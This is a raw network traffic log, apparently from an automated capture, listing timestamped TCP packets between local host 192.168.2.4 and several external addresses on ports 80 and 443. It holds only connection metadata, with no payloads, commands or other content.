May 25, 2024 21:29:42.848665953 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.849342108 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.849781036 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.850123882 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.850785017 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.850866079 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.851773977 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.852634907 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.852992058 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.853228092 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.853701115 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.853781939 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.854716063 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.854768991 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.854840994 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.854840994 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.888679981 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.888837099 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.934192896 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.934271097 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.934604883 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.934669971 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.935497046 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.935622931 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.939795017 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.939830065 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.939862967 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.939862967 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.939888954 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.939898968 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.939960003 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.940097094 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.940121889 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.940155983 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.940188885 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.940216064 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.942154884 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.942189932 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.942218065 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.942241907 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.943238974 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.943273067 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.943305016 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.943330050 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.943576097 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.943629026 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.943660021 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.943715096 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:42.948985100 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:42.949065924 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.026191950 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.026349068 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.032336950 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.032402992 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.044260025 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.044291019 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.044337988 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.044428110 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.044717073 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.044883966 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.044887066 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.044920921 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.044975996 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.045058966 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.045840979 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.045874119 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.045924902 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.045924902 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.047471046 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.047503948 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.047537088 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.047559023 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.047600985 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.047600985 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.048975945 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.049036026 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.050054073 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.050086975 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.050137997 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.050137997 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.050539970 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.050571918 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.050714016 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.050736904 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.051260948 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.051443100 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.052062988 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.052097082 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.052145958 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.052145958 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.052985907 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.053080082 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.053599119 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.053632021 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.053719997 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.053719997 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.054886103 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.055016994 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.055480957 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.055558920 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.056068897 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.056139946 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.058396101 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.058481932 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.060090065 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.060184956 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.060364962 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.060463905 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.061489105 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.061582088 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.062264919 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.062416077 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.062436104 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.062469959 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.062520981 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.062520981 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.063824892 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.063858986 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.063910007 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.063910007 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.064440966 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.064475060 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.064507961 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.064537048 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.064537048 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.064573050 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.066714048 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.066771030 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.066809893 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.066809893 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.067168951 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.067209959 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.067239046 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.067257881 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.067257881 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.067450047 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.067914009 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.068042994 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.068223000 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.068285942 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.068855047 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.068890095 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.068943024 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.068943024 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.071749926 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.071784019 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.071815968 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.071854115 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.071871996 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.074959040 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.075062990 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.075470924 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.075548887 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.075787067 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.076078892 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.076941013 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.076997042 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.077814102 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.077848911 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.077883005 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.077924013 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.078061104 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.078362942 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.078444004 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.082766056 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.082798958 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.082866907 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.082866907 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.116755962 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.116906881 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.260705948 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.260756016 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.260824919 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.260824919 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.261044025 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.261149883 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.261678934 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.261833906 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.262145042 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.262180090 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.262223005 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.262223005 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.263206959 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.263355970 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.263792992 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.263828039 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.263873100 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.263873100 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.264940023 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.264975071 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.265028000 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.266253948 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.267028093 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.267190933 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.267751932 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.267869949 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.267878056 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.268356085 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.268361092 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.268704891 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.268754005 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.268824100 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.269191980 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.269227028 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.269262075 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.269541025 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.270075083 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.270178080 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.270550966 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.270586014 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.270618916 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.270675898 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.270675898 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.270688057 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.271627903 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.271764994 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.271823883 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.272628069 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.275161028 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.275193930 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.275331020 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.275372982 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.275696039 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.275842905 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.276174068 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.276207924 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.276602030 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.276900053 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.276937008 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.277272940 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.277307034 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.277870893 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.277904987 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.277936935 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.277967930 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.277967930 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.278012991 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.279571056 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.279964924 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.281977892 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.282058001 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.282067060 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.282093048 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.282144070 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.282144070 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.282386065 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.282419920 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.282469988 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.282469988 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.282967091 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.283029079 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.283449888 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.283483982 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.283509016 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.283807993 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.284076929 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.284110069 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.284137011 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.284284115 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.284459114 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.284543991 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.286598921 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.286662102 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.286711931 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.286745071 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.286792994 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.286792994 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.287130117 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.287163973 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.287214994 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.287214994 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.287796974 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.287863016 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.288120985 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.288153887 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.288204908 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.288204908 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.335892916 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.336196899 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.438812017 CEST	49758	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:43.438812017 CEST	49757	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:43.449318886 CEST	80	49758	213.172.74.157	192.168.2.4
May 25, 2024 21:29:43.452047110 CEST	49758	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:43.452183008 CEST	49758	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:43.454165936 CEST	80	49757	213.172.74.157	192.168.2.4
May 25, 2024 21:29:43.458039999 CEST	49757	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:43.458281994 CEST	49757	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:43.459146023 CEST	80	49758	213.172.74.157	192.168.2.4
May 25, 2024 21:29:43.464024067 CEST	80	49757	213.172.74.157	192.168.2.4
May 25, 2024 21:29:43.480715036 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.482738018 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.482770920 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.482863903 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.482863903 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.482988119 CEST	49754	80	192.168.2.4	189.163.126.89
May 25, 2024 21:29:43.497597933 CEST	443	49756	103.174.152.66	192.168.2.4
May 25, 2024 21:29:43.497840881 CEST	49756	443	192.168.2.4	103.174.152.66
May 25, 2024 21:29:43.500024080 CEST	49756	443	192.168.2.4	103.174.152.66
May 25, 2024 21:29:43.500040054 CEST	443	49756	103.174.152.66	192.168.2.4
May 25, 2024 21:29:43.500375986 CEST	443	49756	103.174.152.66	192.168.2.4
May 25, 2024 21:29:43.505845070 CEST	80	49754	189.163.126.89	192.168.2.4
May 25, 2024 21:29:43.511821985 CEST	49756	443	192.168.2.4	103.174.152.66
May 25, 2024 21:29:43.554507017 CEST	443	49756	103.174.152.66	192.168.2.4
May 25, 2024 21:29:44.205470085 CEST	443	49756	103.174.152.66	192.168.2.4
May 25, 2024 21:29:44.210287094 CEST	443	49756	103.174.152.66	192.168.2.4
May 25, 2024 21:29:44.214025974 CEST	49756	443	192.168.2.4	103.174.152.66
May 25, 2024 21:29:44.214204073 CEST	49756	443	192.168.2.4	103.174.152.66
May 25, 2024 21:29:44.214204073 CEST	49756	443	192.168.2.4	103.174.152.66
May 25, 2024 21:29:44.214224100 CEST	443	49756	103.174.152.66	192.168.2.4
May 25, 2024 21:29:44.214253902 CEST	443	49756	103.174.152.66	192.168.2.4
May 25, 2024 21:29:44.237890959 CEST	49759	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:44.257479906 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:44.284486055 CEST	80	49759	158.160.165.129	192.168.2.4
May 25, 2024 21:29:44.284523010 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:44.284641027 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:44.284933090 CEST	49759	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:44.284933090 CEST	49759	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:44.284933090 CEST	49759	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:44.285365105 CEST	49760	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:44.295263052 CEST	80	49759	158.160.165.129	192.168.2.4
May 25, 2024 21:29:44.347810984 CEST	80	49759	158.160.165.129	192.168.2.4
May 25, 2024 21:29:44.347841978 CEST	80	49760	213.172.74.157	192.168.2.4
May 25, 2024 21:29:44.396945000 CEST	80	49757	213.172.74.157	192.168.2.4
May 25, 2024 21:29:44.397026062 CEST	49757	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:44.397099972 CEST	49757	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:44.401830912 CEST	80	49757	213.172.74.157	192.168.2.4
May 25, 2024 21:29:44.401863098 CEST	80	49758	213.172.74.157	192.168.2.4
May 25, 2024 21:29:44.401890993 CEST	80	49758	213.172.74.157	192.168.2.4
May 25, 2024 21:29:44.401906013 CEST	49757	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:44.401932955 CEST	49758	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:44.401969910 CEST	49758	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:44.404700994 CEST	49758	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:44.447427988 CEST	80	49758	213.172.74.157	192.168.2.4
May 25, 2024 21:29:44.447525978 CEST	49758	80	192.168.2.4	213.172.74.157
May 25, 2024 21:29:44.452162981 CEST	80	49757	213.172.74.157	192.168.2.4
May 25, 2024 21:29:44.452192068 CEST	80	49758	213.172.74.157	192.168.2.4
May 25, 2024 21:29:45.030427933 CEST	80	49759	158.160.165.129	192.168.2.4
May 25, 2024 21:29:45.030564070 CEST	49759	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:45.033174992 CEST	49761	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:45.034949064 CEST	80	49759	158.160.165.129	192.168.2.4
May 25, 2024 21:29:45.034997940 CEST	49759	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:45.042057991 CEST	80	49759	158.160.165.129	192.168.2.4
May 25, 2024 21:29:45.087693930 CEST	80	49761	158.160.165.129	192.168.2.4
May 25, 2024 21:29:45.087775946 CEST	49761	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:45.087893009 CEST	49761	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:45.087918997 CEST	49761	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:45.154614925 CEST	80	49761	158.160.165.129	192.168.2.4
May 25, 2024 21:29:45.203504086 CEST	80	49761	158.160.165.129	192.168.2.4
